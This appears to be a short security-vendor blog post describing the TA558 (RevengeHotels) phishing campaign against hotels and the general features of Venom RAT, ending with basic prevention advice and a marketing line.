TA558 Targets Hotels
The TA558 group, also known as RevengeHotels, attacks hotels in Brazil. It uses AI-generated phishing emails. For example, it deploys Venom RAT. The campaign started in summer 2025.
Attackers use AI to craft phishing emails. These emails mimic invoices and job offers. Consequently, they appear legitimate. This tricks hotel staff into clicking links.
Emails deliver JavaScript payloads. These scripts fetch PowerShell downloaders. For instance, they retrieve additional malware. This leads to Venom RAT deployment.
Venom RAT’s Features
Venom RAT steals credit card data. It acts as a reverse proxy. Moreover, it includes anti-kill protections. This ensures uninterrupted operation.
The malware blocks process termination. It checks for security tools every 50 milliseconds. Therefore, it kills analysis programs. This maintains its presence. enom RAT modifies system settings. It uses registry changes for persistence. Additionally, it marks itself as critical. This prevents shutdown attempts.
USB Spread and AV Evasion
The malware spreads via USB drives. It disables antivirus programs. For example, it tampers with task schedulers. This bypasses security measures.
The campaign focuses on hotel systems. It steals data from booking platforms. Moreover, it targets Spanish-speaking regions. This expands its reach.
AI tools generate the attack scripts. They produce heavily commented code. For instance, this mimics legitimate formats. This enhances evasion.
TA558 refines its attack methods. It adapts to new regions. Therefore, it poses a growing risk. AI use makes attacks more effective.
Preventing TA558 Attacks
To stop TA558, train staff to spot phishing emails. Use advanced email filters. Additionally, real-time threat monitoring detects scripts. Keep antivirus updated to block RATs. By staying vigilant, hotels can protect guest data.
Sleep well, we got you covered.
